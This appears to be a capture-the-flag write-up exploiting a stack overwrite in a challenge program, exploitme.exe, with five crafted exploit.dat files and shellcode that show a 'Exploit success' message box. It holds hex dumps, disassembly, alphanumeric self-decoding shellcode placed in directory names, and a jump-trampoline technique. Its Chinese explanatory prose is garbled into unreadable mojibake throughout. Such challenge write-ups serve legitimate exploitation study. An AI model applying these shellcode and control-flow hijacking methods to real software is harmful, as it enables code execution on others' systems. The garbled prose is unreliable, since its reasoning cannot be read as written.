1.·ÖÎöÌâÄ¿,ÕÒ×¼ÇÐÈëµã: ´ÓÌâÄ¿¿ÉÖªÊÇÒªÇóÎÒÃÇдһ¸öµ¯³ö¶Ô»°¿òµÄSHELLCODE.ͬʱ µÃ·Ö×î¶àµÄ±ê×¼¼òµ¥Ëµ¾ÍÊÇ¿´Ë­µÄexploit.datÖеÄSHELLCODE·ÇÁã×Ö·û×îÉÙ. 2.·ÖÎöEXPLOITME.EXE: ¼òµ¥·ÖÎö¿ÉÖª³ÌÐòÊǸö±ê×¼µÄVC³ÌÐò,³ÌÐòÖ÷ÒªÁ÷²ãΪ:ÏÈÅжÏexploit.DAT µÄÎļþ´óС,´óÓÚ200HÍ˳ö,ÈçСÓÚ200HÔò¶ÁÎļþͬʱµÃµ½ÎļþµÄʵ¼Ê´óС:Èç¹û´óÓÚ 84HÔò²»×ßµ½³ö´íÁ÷²ãͬʱµ¯³öfailµÄ¶Ô»°¿ò. Áí:³ÌÐòÖл¹°üÀ¨¶¯Ì¬µÃµ½MessageBoxAºÍMessageBoxWµÄº¯ÊýµØÖ·,ͬʱ±£´æÔÚÈ«¾Ö±äÁ¿ÖÐ. ÓÉÓÚ³ÌÐòÊÇVC³ÌÐò,ËùÒÔÔÚ³ÌÐò³õʼ»¯Ê±»¹»áÖ´ÐÐһЩ´úÂëÒԵõ½³ÌÐò»·¾³±äÁ¿µÈ (±ÈÈ統ǰ·¾¶ºÍ³ÌÐòÃû) 3.³ö´í´úÂë¼òµ¥·ÖÎö: ¼òµ¥Ëµ¾ÍÊÇEXPLOIT.DATÖеÄÊý¾Ý¸²¸ÇÁ˱£´æÔÚÕ»ÖеÄÒ»¸öº¯ÊýµØÖ·,ÔÚ½ÓÏÂÀ´µÄ´úÂë »áÓÐÒ»¸öcall [edx],ÕâʱEDXÒѾ­Äܹ»±ä³ÉÎÒÃǵÄÈÎÒâÊý¾Ý.ͬʱ¾­¹ýÕâÒ»²½µÄ·ÖÎö¿É Öª¶ÔEXPLOIT.DATÖеÄÊý¾Ý¸ñʽûÓÐÈκÎÒªÇó,ûÓо­¹ýÈκαàÂëת»».¾ßÌå³ö´í´úÂëÈçÏÂ: mov ecx, ebx mov esi, ebp mov edx, ecx lea edi, [esp+328h+var_280] shr ecx, 2 rep movsd mov ecx, edx and ecx, 3 rep movsb mov eax, [esp+328h+var_308] lea ecx, [esp+328h+var_308] call dword ptr [eax] mov edx, [esp+328h+var_284] ;ÕâʱȡµÄEDXÖµÒѾ­¿É¿Ø lea ecx, [esp+328h+var_284] call dword ptr [edx] ;Õâ¶ùÌøµ½SHELLCODE mov edi, [esp+328h+hHeap] mov esi, [esp+328h+hObject] mov [esp+328h+var_318], 1 4.·ÖÎö©¶´ ͨ¹ý¼òµ¥µ÷ÊÔ¿ÉÖªÔÚexploit.datµÄ80Hµ½83H´¦µÄËĸö×ֽڸպÿÉÒÔ¿ØÖÆ EDX.Õâ¶ù¾ÍÊÇͨ³£Ëù˵µÄÌøתµØַλÖÃ. ÓÉÓÚÌøתµØÖ·µÄ×÷ÓÃÖ÷ÒªÊÇÖ±½Ó»òÊǼä½ÓµÄÖ¸ÏòSHELLCODE,¾ßÌåÖµµÄÑ¡Ôò ºÍ½âÌâ˼·ÓëshellcodeµÄ´æ·ÅλÖÃÓйØ. 5.½âÌâ˼·: ͨ¹ý·ÖÎö³ÌÐòºÍ©¶´µÃµ½Èý¸ö´óµÄ˼·: ˼·1: ³öÌâÕß¿ÉÄÜÔÚ¸ÃEXEµÄij¸öµØ·½ÁôÓÐÌØÊâ´úÂë,ÕâÑù¾Í¿ÉÄÜ´æÔÚÓÃ1¸ö»òÊÇ2×Ö½Ú ¸²¸ÇEDXºó,¾Í¿ÉÒÔÌøµ½ÌØÊâ´úÂë,È»ºóÍê³ÉÏà¹Ø¹¦ÄÜ.ÕâÑùµÄ»°EXPLOIT.DATÖÐµÄ ·Ç0×Ö½Ú¿ÉÒÔ×öµÃ·Ç³£ÉÙ. µ«¶ÔEXEÈÏÕæ·ÖÎöºó,ÎÒûÓз¢ÏÖÏà¹Ø´úÂë,ˮƽÓÐÏÞËùÒÔ¸Ã˼·ÎÒÎÞ½â. ˼·2: ÈÏÕæ·ÖÎö¸ÃÌâµÄÒªÇó,ֻ˵Á˲»ÄÜÐÞ¸Äexploitme.exe³ÌÐò±¾Éí,µ«²¢Ã»ÓÐ˵²»ÄÜ Ð޸ĸóÌÐòµÄÎļþÃû,»òÊÇÈøóÌÐò´øÌØÊâ²ÎÊý,»òÊÇÈøóÌÐòÔÚÖ¸¶¨µÄλÖÃÔËÐÐ ÓÖ»òÕßÊǶÔOSµÄ»·¾³±äÁ¿½øÐÐÉèÖõȵÈ. ÀûÓÃÉÏÊö˼·,ÎÒ×îÖÕÍê³É¶à¸öEXP,×îÇÉÃîµÄ¿ÉÒÔ×öµ½·Ç0×Ö½Ú½ôÓÐ2×Ö½Ú. (Èç¹û³öÌâÕß²»ÈÏͬ¸Ã˼·ÄÇôÇ뿴˼·3) ˼·3: ¸Ã˼·Ïà¶Ô±È½Ï±£ÊØÒ²¾ÍÊÇÔÚ³ÌÐòÖ´ÐеÄʱºò,ËùÓÐSHELLCODEºÍ×Ö´®µÈÈ«²¿·ÅÔÚ exploit.datÖÐ. ˼·2ºÍ˼·3µÄ±È½Ï: Èç¹û˼·2Äܵõ½ÈÏͬÄÇôÎÞÄýÊÇexploit.datÖзÇ0×Ö½Ú×îÉÙµÄ,ÒòΪexploit success Õâ¸ö×Ö´®ºÍÖ¸Á¿ÉÒÔ·ÅÔÚexploit.datÖ®Íâ.(µ±È»ÓÐЩÈË¿ÉÄÜÊÇÓв¿·Ö×Ö´®·ÅÔÚexploit.dat Ö®ÍâÒ»²¿·Ö´úÂëÔÚexploit.datÖÐ,ÎÒÈÏΪÕâÆäʵҲÊÇ˼·2) ˼·2µÄ¹Ø¼ü:¹Ø¼üµãÎÒÈÏΪÊÇÒªÕÒµ½Ò»¸öÎÒÃǿɿصÄ×Ö´®,¸Ã×Ö´®ÔÚEXPLOITME.EXEÖдæÔÚÇÒ ×Ö´®ÎÒÃÇ¿É¿Ø»ò²¿·Ö¿É¿Ø,ͬʱ¸Ã×Ö´®µÄÖ·Ö·ÔÚEXPLOITME.EXEÖÐÓб£´æ. ˼·3Æäʵ·Ç³£¼òµ¥Ö÷ÒªÊÇÁ½²½: Ò»²½Êǹ¹ÔìÌøת,ÁíÒ»²½Êǹ¹ÔìSHELLCODE,¾­¹ýÎҵļÆËãÈç¹ûÊÇÀûÓÃÁËÕ»µØÖ·,¸Ã˼·exploit.datÖеķÇ0×Ö½ÚÓ¦¸ÃÊÇ26-33×Ö½ÚÖ®¼ä. 6.¹¹ÔìEXP ˼·2µÄEXP˵Ã÷: Ê×ÏÈÎÒͨ¹ý·ÖÎöEXEÎļþ·¢ÏÖÔÚ0040855c(Õâ¶ùÊÇEXEµÄÈ«¾Ö±äÁ¿Çø)´¦±£´æÁËÒ»¸öÖµ,Õâ¸öÖµ ͨ³£ÊÇ00408574.¶ø00408574´¦µÄÖµ¸ÕºÃÊÇEXEÔËÐеÄʱºò·¾¶ºÍÎļþÃû±ÈÈçc:\masm32\bin\exploitme.exe,×Ö´®ÊÇansiÐÎʽ. ÄÇôÎÒÃÇ°Ñexploit.datÉèΪÈçÏÂ: 00000000h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................ 00000010h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................ 00000020h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................ 00000030h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................ 00000040h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................ 00000050h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................ 00000060h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................ 00000070h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................ 00000080h: 5C 85 ; \ µÈÓÚ˵ÊÇÕ»ÖеÄEDXµÄÖµÎÒÃÇÖ»¸²¸ÇÄÚ´æµÄµÍ×Ö½Ú,±¾À´EDXÊÇ0040XXXX ÏÖÔھͱä³ÉÁË0040855c ÄÇôcall [edx]¾ÍµÈÓÚcall [0040855c]Ò²¾ÍµÈÓÚcall 00408574 ¶ø00408574µÄֵΪÎÒÃǵÄ·¾¶C:\.............,ת»»³É´úÂëÒ²¾ÍÊÇ :u 00408574 l 30 001B:00408574 43 INC EBX ;C 001B:00408575 3A5C6161 CMP BL,[ECX+61] ;:\aa 001B:00408579 884257 MOV [EDX+57],AL 001B:0040857C 88424D MOV [EDX+4D],AL 001B:0040857F 83C24E ADD EDX,4E 001B:00408582 50 PUSH EAX 001B:00408583 52 PUSH EDX 001B:00408584 83EA41 SUB EDX,41 001B:00408587 83C231 ADD EDX,31 001B:0040858A 52 PUSH EDX 001B:0040858B 50 PUSH EAX 001B:0040858C 83EA43 SUB EDX,43 001B:0040858F 83EA43 SUB EDX,43 001B:00408592 52 PUSH EDX 001B:00408593 58 POP EAX 001B:00408594 FF30 PUSH DWORD PTR [EAX] 001B:00408596 58 POP EAX 001B:00408597 FFD0 CALL EAX 001B:00408599 C3 RET ¸ÃEXPµÄÓŵã:¹Ø¼üµÄÌøתµØÖ·ÀûÓõÄÊÇEXEµÄ±ä¾Ö±äÁ¿ÖеÄ,ÓÉÓÚ¸ÃEXE²»»á±ä»¯ÇÒ¸ÃEXEÒ²ºÜ¼òµ¥ ÎÒÔÚXP SP2/SP3/VISTAϾù²âÊÔͨ¹ý,ͨÓÃÐԷdz£ºÃ(û¿¼ÂÇDEP),ÇҸóÌÐò²»Ö§³ÖASLR. ÏÂÃæÀ´Ëµ¾ßÌåµÄSHELLCODE: ÓÉÓÚÎÒÅÂÓÐÈËÕÒµ½ºÍÎÒͬÑùµÄ˼·,È»ºó³öÌâÕ߻ῼÂÇÔÚÕâ¸ö´ó˼·ÏÂÔٱȽÏÿÈ˾ßÌåµÄSHELLCODE ´óС¶ø·Çexploit.datÖеķÇ0×Ö½ÚÊýËùÒÔÎÒдÁËËĸöÀûÓÃÕâ¸ö˼·µ«ÓÖ²»Í¬µÄEXP,ÏÂÃæÎÒÒ»Ò»½éÉÜ: £¨ÒÔÏ·ֱðÓà EXP1¡¢EXP2¡¢EXP3¡¢EXP4¡¢EXP5 À´·Ö±ð˵Ã÷£© EXP1: exploit.datÖзÇ0×Ö½Ú½öΪÁ½×Ö½Ú,SHELLCODEºÍExploit successµÄ×Ö´®È«·ÅÔÚĿ¼ÖÐ,ÇÒĿ¼Ãû ¾­¹ý±àÂëΪȫ×ÖĸÊý×Ö. Ŀ¼ÃûÈçÏÂ: aaB777777RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJImSktbpazd3PhE5Wpt3c00hsSuP1s5Pqx0suPqeuPe8bTUPupS0u8BOS0Qyc0CX40wpPlWpQxCu5PpxS0LKyLLCzL6LrJuPsXRLQpcpUPScRJwpE8ZnVqQPUPJcWpA ¹¥»÷·½·¨£º Ö»ÒªÔÚCÅ̸ùĿ¼Ï½¨Á¢ÈçÉÏÊöµÄĿ¼,È»ºó°Ñexploit.datºÍEXE·ÅÔÚ¸ÃĿ¼ÖÐ,Ë«»÷¾Í¿Éµ¯³öÕýÈ·µÄ¶Ô»°¿ò,¸ÃĿ¼µÄ³¤¶ÈΪ167×Ö½Ú(û°üÀ¨C:\) ²¹³ä:³öÌâÕß¿ÉÄÜ»áÎÊÈç¹ûÎÒµÄĿ¼µÄ¿ªÍ·²»ÊÇCÅÌ»òÊÇÅÌ·ûÊÇc(Сд)ÄãµÄSHELLCODE¾Í»á³ö´í,ÕâÆäʵ ÊÇ¿ÉÒÔ½â¾öµÄ,Ö»ÊǾÍҪרÃÅ·ÖÎöÁË,ËùÒÔ¸ÃÌâÖеÄĿ¼һÂɶ¼ÊÇÔÚCÅ̸ùĿ¼ÏÂ:),ÖÁÓÚСдµÄcÊDz»»á³öÏÖÕâÖÖÇé¿öµÄ. ÁíÍâÔÚEXP1ÖÐʹÓõÄÊÇMessageBoxW,Exploit successµÄ×Ö´®µÄ¹¹ÔìÎÒÊÇÓõÄPUSH XX00XX00µÄÐÎʽ ͬʱEXP1´¦ÀíÁËESPÈóÌÐò¿ÉÒÔÕý³£Í˳ö,Èç¹û²»ÄÜÕý³£Í˳ö³ÌÐò»¹¿ÉÒÔÔÙСЩ. ¸ÃEXPµÄSHELLCODEÈçÏÂ: 00000000h: 83 C4 50 6A 73 68 65 00 73 00 68 63 00 63 00 68 ; ƒÄPjshe.s.hc.c.h 00000010h: 73 00 75 00 68 74 00 20 00 68 6F 00 69 00 68 70 ; s.u.ht. .ho.i.hp 00000020h: 00 6C 00 68 45 00 78 00 8B DC 83 EC 2C 6A 00 68 ; .l.hE.x.‹Üƒì,j.h 00000030h: 6C 60 40 00 53 6A 00 68 CE 11 40 00 C3 ; l`@.Sj.h?@. ×¢ÒâÊÇÒÔÉÏ´úÂëÎÒÊÖ¹¤¹¹ÔìµÄ,ºÇºÇËùÒÔûԴ´úÂë,½âÂëµÄSCÒ²ÊÇÊÖ¹¤¹¹ÔìµÄ,ÈçÏ :u 00408574 l 30 001B:00408574 43 INC EBX 001B:00408575 3A5C6161 CMP BL,[ECX+61] ;nop like´úÂë,Ìø¹ý:\ 001B:00408579 42 INC EDX 001B:0040857A 37 AAA ;nop like,ΪÁ˵ØÖ·¶ÔÆë 001B:0040857B 37 AAA 001B:0040857C 37 AAA 001B:0040857D 37 AAA 001B:0040857E 37 AAA 001B:0040857F 37 AAA 001B:00408580 52 PUSH EDX ;EDXÖ¸ÏòSCÖÜΧ 001B:00408581 59 POP ECX 001B:00408582 6A41 PUSH 41 001B:00408584 58 POP EAX 001B:00408585 50 PUSH EAX 001B:00408586 304130 XOR [ECX+30],AL ;´úÂ뿪ʼ×ÔÐÞ²¹ 001B:00408589 41 INC ECX 001B:0040858A 6B414151 IMUL EAX,[ECX+41],51 001B:0040858E 324142 XOR AL,[ECX+42] 001B:00408591 324242 XOR AL,[EDX+42] 001B:00408594 304242 XOR [EDX+42],AL 001B:00408597 41 INC ECX 001B:00408598 42 INC EDX 001B:00408599 58 POP EAX 001B:0040859A 50 PUSH EAX 001B:0040859B 384142 CMP [ECX+42],AL 001B:0040859E 754A JNZ 004085EA ×îºóÒ»ÐÐÓÉÓÚÊÇ×ÔÐÞ²¹,ËùÒÔÕâ¶ùÊDz»×¼È·µÄ. ½âÂë³öÀ´ºóµÄSCÈçÏÂ: :u 004085a0 l 40 001B:004085A0 83C450 ADD ESP,50 001B:004085A3 6A73 PUSH 73 001B:004085A5 6865007300 PUSH 00730065 001B:004085AA 6863006300 PUSH 00630063 001B:004085AF 6873007500 PUSH 00750073 001B:004085B4 6874002000 PUSH 00200074 001B:004085B9 686F006900 PUSH 0069006F 001B:004085BE 6870006C00 PUSH 006C0070 001B:004085C3 6845007800 PUSH 00780045 001B:004085C8 8BDC MOV EBX,ESP ;EBXÖ¸ÏòExploit success 001B:004085CA 83EC2C SUB ESP,2C 001B:004085CD 6A00 PUSH 00 001B:004085CF 686C604000 PUSH 0040606C ; "ExploitMe" ;±êÌâÓÃÁËÈ«¾Ö±äÁ¿ÖÐµÄ 001B:004085D4 53 PUSH EBX 001B:004085D5 6A00 PUSH 00 001B:004085D7 68CE114000 PUSH 004011CE ;APIµÄµØÖ·ÊÇÓ²±àÂë,µ«¿Ï¶¨Í¨Óà 001B:004085DC C3 RET EXP2: EXP2ÔòÊÇʹÓÃÁËMessageBoxA,²¢ÇÒ°ÑExploit successŪÔÚÁËĿ¼ÃûÀï,½âÂëSCºÍÉÏÃæµÄÀàËƲ»¸ø³öÁË Ä¿Â¼ÃûÈçÏÂ: aaB777777RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI4sKpNhcqSbMXQQsl2pOsKqf3PQNcm9R03a2pyo5EuDmUspuPV8ISuPAExploit success ³¤¶È112×Ö½Ú ½âÂëºóµÄSCΪ: :u 004085a0 l 30 001B:004085A0 33C0 XOR EAX,EAX 001B:004085A2 884152 MOV [ECX+52],AL ;Ö÷ÒªÊÇ°Ñ·¾¶ÖеÄExploit success\,ÖеÄ\¸ÄΪ0x00 001B:004085A5 88415C MOV [ECX+5C],AL ;Ö÷ÒªÊÇ°Ñ·¾¶ÖеÄExploitMe.exe,ÖеÄ.¸ÄΪ0x00 001B:004085A8 50 PUSH EAX 001B:004085A9 83C153 ADD ECX,53 001B:004085AC 51 PUSH ECX 001B:004085AD 83E910 SUB ECX,10 001B:004085B0 51 PUSH ECX 001B:004085B1 50 PUSH EAX 001B:004085B2 FF1514854000 CALL [USER32!MessageBoxA] 001B:004085B8 58 POP EAX 001B:004085B9 C3 RET Õâ¸öSC±È½ÏÖØÒªµÄµØ·½ÊÇ,ÕÒµ½ÁË00408514Õâ¸öÈ«¾Ö±äÁ¿ÖÐÓаü´æMESSAGEBOXAµÄµØÖ·.ËùÒÔ SCСÁ˲»ÉÙ. EXP3: ¸ÃEXPÊÇÒÔÉϼ¸ÖÖÖÐ×î¶ÌµÄ,Ŀ¼ÃûÖ»ÓÐ50¸ö×Ö½Ú,µ«ÊÇĿ¼ÃûÖÐʹÓÃÁ˺º×ÖºÍ0xff,Ò²¾ÍÊÇÿ È«ÊÇÕâÑù¾Í²»Òª½âÂëµÄSCÁË,ËùÒԷdz£¶Ì.»µ´¦¾ÍÊÇÔÚ·ÇÖÐÎÄÏ¿ÉÄܲ»ÐÐ aaˆBWˆBMƒÂNPRƒêAƒÂ1RPƒêCƒêCRXÿ0XÿÐÃExploit success ¶Ô,Äãû¿´´íÉÏÃæ¾ÍÊÇĿ¼Ãû.16½øÖÆÈçÏÂ: 00000000h: 61 61 88 42 57 88 42 4D 83 C2 4E 50 52 83 EA 41 ; aaˆBWˆBMƒÂNPRƒêA 00000010h: 83 C2 31 52 50 83 EA 43 83 EA 43 52 58 FF 30 58 ; ƒÂ1RPƒêCƒêCRXÿ0X 00000020h: FF D0 C3 45 78 70 6C 6F 69 74 20 73 75 63 63 65 ; ÿÐÃExploit succe 00000030h: 73 73 ; ss ÿһ¸ö×Ö½Ú¶¼²»ÊǶàÓàµÄ.ת³ÉASMÈçÏÂ(×¢:È«ÊÇÊÖ¹¤16½øÖÆ´ò³öÀ´µÄûÕæÕýµÄÔ´´úÂë) :u 00408574 l 30 001B:00408574 43 INC EBX 001B:00408575 3A5C6161 CMP BL,[ECX+61] 001B:00408579 884257 MOV [EDX+57],AL 001B:0040857C 88424D MOV [EDX+4D],AL 001B:0040857F 83C24E ADD EDX,4E 001B:00408582 50 PUSH EAX 001B:00408583 52 PUSH EDX 001B:00408584 83EA41 SUB EDX,41 001B:00408587 83C231 ADD EDX,31 001B:0040858A 52 PUSH EDX 001B:0040858B 50 PUSH EAX 001B:0040858C 83EA43 SUB EDX,43 001B:0040858F 83EA43 SUB EDX,43 ;EDXÖ¸ÏòMSGBOXAµØÖ·µÄ±£´æλÖà 001B:00408592 52 PUSH EDX 001B:00408593 58 POP EAX 001B:00408594 FF30 PUSH DWORD PTR [EAX] 001B:00408596 58 POP EAX 001B:00408597 FFD0 CALL EAX 001B:00408599 C3 RET Ïêϸ´úÂë˵Ã÷¾Í²»¶à˵ÁË,Ò²ÊÇÓÃÁËMessageBoxA,¶ø´æ·Å¸ÃAPIµÄµØÖ·ÎÒÒ²ÊÇÓÃEDXÀ´¶¨Î»µÄ ÒòΪEDXÒ»°ãÊÇ0040855c,¶øÕâ¸öAPIµØÖ·ÊÇ·ÅÔÚ00408514,ËùÒÔEDX¼õÁ½´Î¾ÍÄÜÖ¸µ½Õâ¶ù EXP4: ¸ÃEXP4,ÆäʵÊÇÓÃÁËÒ»²¿·ÖÖ¸ÁîÔÚĿ¼ÃûÖÐ,Ò»²¿·ÖÔÚEXPLOIT.DATÖÐ,¶øexploit successÓÖÒª ÃüÁî²ÎÊýÖÐ,¶àÖÖ·½·¨Ïà½áºÏ.EXPLOIT.DATµÄ´óСΪ10×Ö½Ú EXPLOIT.DATÖÐֵΪ: 00000000h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................ 00000010h: 00 00 00 00 00 00 00 00 CE 11 40 00 00 00 00 00 ; ........?@..... ;Õâ¶ùÊÇAPI 00000020h: 00 0B 02 00 6C 60 40 00 00 00 00 00 00 00 00 00 ; ....l`@......... ;Õâ¶ùÊÇ»·¾³¿éÖеÄÃüÁîÐвÎÊý,ºóÃæµÄÊÇÈ«¾Ö±äÁ¿ÖеÄExploitMe´® 00000030h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................ 00000040h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................ 00000050h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................ 00000060h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................ 00000070h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................ 00000080h: 5C 85 ; \ Ŀ¼ÃûÎÒÃÇŪ³É: C:\aaaaÃæaaaaaaaaaaaaaaaaaaaaaaaa1234 Ö´ÐгÌÐòµÄʱºòÎÒÃÇÕâÑùÖ´ÐÐ C:\aaaaÃæaaaaaaaaaaaaaaaaaaaaaaaa1234>exploitme Exploit success ·ÖÎö: 5C85ÊÇʲôÒâ˼,Ç°ÃæÒѾ­ËµÁ˲»¶à˵. Ŀ¼ÃûΪc:\aaaaÃæ................... ·´»ã±à³öÀ´¾ÍÊÇ 001B:00408574 43 INC EBX 001B:00408575 3A5C6161 CMP BL,[ECX+61] 61 POPAD 61 POPAD C3 RET XXXXX Ò²¾ÍÊÇ˵c:\ºóÃæµÄaaÊÇNOP LIKEÖ¸Áî,ͬʱcmp bl,[ecx+61],ÒòΪECX×ÜÊÇÔÚ0012XXXX»òÊÇ0013XXXX ·´ÕýÊÇÕ»Àï,ËùÒÔÕâ¶ùÊDz»»á³ö´íµÄ. ¹Ø¼üÊǺóÃæµÄaaÃæÒ²¾ÍÊÇpopad,popad,retÖ¸Áî Õâ¶ùÊÇÓÃÀ´¶¨Î»SHELLCODEµÄ. È»ºóEXPLOIT.DATÖеÄ00020B00ÓбØҪ˵һÏÂ:ÒòΪÕâ¶ùÓÐÁ½¸ö00,Ö÷ÒªÊÇÎÒÔÚĿ¼ÃûºóÃæ²¹ÁËÒ»³¤´® aaaaaaa....,ÕâÑù¿Ï¶¨ÊÇ¿ÉÒÔÈÃÖ¸Ïò»·¾³±äÁ¿ÖеÄExploit successµÄµØÖ·ÖÐÓÐÁ½¸ö00µÄ. µ±È»EXP4,ÓÐÒ»¸ö²»Îȶ¨µÄµØ·½Ò²¾ÍÊÇ00020b00µÄʹÓÃ,ÒòΪÕâ¶ùÊÇÓÃÁ˲»Îȶ¨µÄÓ²±àÂëËùÒÔÓÐЩ»úÆ÷ Éϲ»ÐÐ. 7.˼·3µÄEXP5˵Ã÷: Ç°ÃæÒѾ­·ÖÎö¹ý˼·3ÁË,×Ü֮˼·3¾Í±ØÐëÊÇËùÒÔ¶«¶«¶¼ÔÚexploit.datÖÐÎÒµÄÈçÏÂ: 00000000h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................ 00000010h: 00 00 00 00 00 00 00 00 CE 11 40 00 00 00 00 00 ; ........?@..... 00000020h: A4 FC 13 00 6C 60 40 00 00 00 00 00 45 00 78 00 ; ¤ü..l`@.....E.x. 00000030h: 70 00 6C 00 6F 00 69 00 74 00 20 00 73 00 75 00 ; p.l.o.i.t. .s.u. 00000040h: 63 00 63 00 65 00 73 00 73 00 00 00 00 00 00 00 ; c.c.e.s.s....... 00000050h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................ 00000060h: 00 00 00 00 00 00 00 00 00 00 00 00 61 61 C3 00 ; ............aa? 00000070h: 00 00 00 00 00 00 00 00 00 00 00 00 E4 FC 13 00 ; ............äü.. 00000080h: F4 FC 13 00 ; ôü.. ¸öÈËÈÏΪÕâÖÖ˼·ûɶºÃ·ÖÎöµÄ,·ÖÖµÒ²²»»á²îºÃ´ó(26-33×Ö½Ú).ÖÁÓÚͨÓÃÐÔÓÉÓÚ ÓÐÈý´¦ÓÃÁË0013xxxx,¶øÓÐЩ»úÆ÷ÉÏÕâ¶ù×ÜÊÇ0012xxxx,ËùÒÔͨÓÃÐÔ²»»áÌ«ºÃ. ×îºó×ܽá: ¹ØÓÚͨÓÃÐÔ,ÎÒÏëÈç¹ûÊÇÓÃÕ»ÖеÄÓ²±àÂëµØÖ·±ÈÈç0012XXXX»òÊÇ0013XXXX¶¼²»»áÌ«ºÃ,µ« ÊÇÏó004011CE»òÊÇ0040606C,ÒòΪÕâ¸ö³ÌÐò±È½Ï¼òµ¥Ó¦¸ÃÊǷdz£Í¨ÓõÄ,Èç¹ûÊÇʵ¼ÊÓ¦Óà ÓÃ0040XXXXµÄµØÖ·Ó¦¸Ã˵ÊÇ·ÖEXE°æ±¾. ÁíÍâÎÒµÄ˼·3,Ä¿Ç°ÊÇ33×Ö½Ú»¹¿ÉÒÔÔÙÉÙÂð,ÎÒÏë¿ÉÒÔÉٵĵط½Ö»ÄÜÊÇÔÚ6CH,7CH,80HÕâÈý ¸öµØ·½Ò²¾ÍÊÇÌøתµØ¹¹ÔìºÍSCµÄ¶¨Î»µÄÇÉÃîÉÏ. ËùÒÔÓÃ˼·3µÄ·Ç0×Ö½Ú³¤¶ÈÓ¦¸ÃÕâÑùÀ´Ëã: 15×Ö½ÚµÄ×Ö´®+3×Ö½ÚAPI+6×Ö½Ú×Ö´®µØÖ·=24 È»ºó×îÆðÂëÒª2¸ö×Ö½ÚµÄÌøת,ËùÒÔ˼·3×îÉÙÊÇ26×Ö½Ú! ÉÙÓÚ26×ֽڵĿÉÒԿ϶¨ÊÇÓÃÁË˼·2»òÊÇ1. ÁíÍâͨÓÃÐÔÉÏÖ»ÒªÊÇÓÃ˼·3,Äã×Ö´®(Exploit success)µÄ¶¨Î»Ò»°ãÀ´ËµÊÇ0013XXXXÀ´¶¨Î»,ËùÒÔ¶¼Ì¸²»ÉÏͨ²»Í¨ÓÃÁË. ÕæÕýÓÐͨÓõİ취Âð: ³ý¿ªË¼Â·2,ÆäʵÊÇÓеÄ,ÖÁÉÙÏà¶ÔÀ´Ëµ,ÎҵķÖÎöÈçÏÂ: Ê×ÏÈÔÚÄÚ´æÖÐÕÒµ½Äܶ¨Î»µ½Õ»ÖÐEXPLOIT.DATÊý¾ÝµÄÖ¸Áî,±ÈÈçÎÒÓõÄ×ÜÊÇPOPAD,POPAD,RET ¼ÙÉèÕâ¸öÖ¸ÁîΪ6161c3,ÄÇôÔÚÄÚ´æÖÐËѵ½ºó,±ÈÈçΪKERNEL32.DLLµÄ´úÂë½Ú,ÎÒÃÇÉèΪ77112233 È»ºóÔÙÔÚÄÚ´æÖпɶÁµÄÇøÓòÕÒ77112233,ÕÒµ½ºó¼ÙÉèÕâ¸öµØַΪ78112233ÄÇô80H´¦ÎÒÃǾͿÉÒÔ ÉèΪ78112233ÄÇôÔÚCALL [EDX]¾ÍÊÇcall [78112233]Ò²¾ÍÊÇcall 77112233,ÄÇô¾ÍÖ±½ÓÌøµ½ POPAD,POPAD,RETÁË,RETºó¾Í¶¨Î»µ½SCÁË. È»ºóÔÚSCÖÐÓÃÎÒÇ°ÃæÓõÄpush 00xx00xxµÄ·½·¨À´¹¹ÔìExploit success,ÕâÑùÒýÓõÄʱºò¾Í·Ç³£µÄͨÓÃ!!²»¹ýÕâÖÖ·½·¨Ò²ÓиöÎÊÌâËäÈ»ÌâĿ¼ÖÐ˵ÁËÊÇXP SP3µ«»¹ÊÇÓв¹¶¡µÄÎÊÌâ.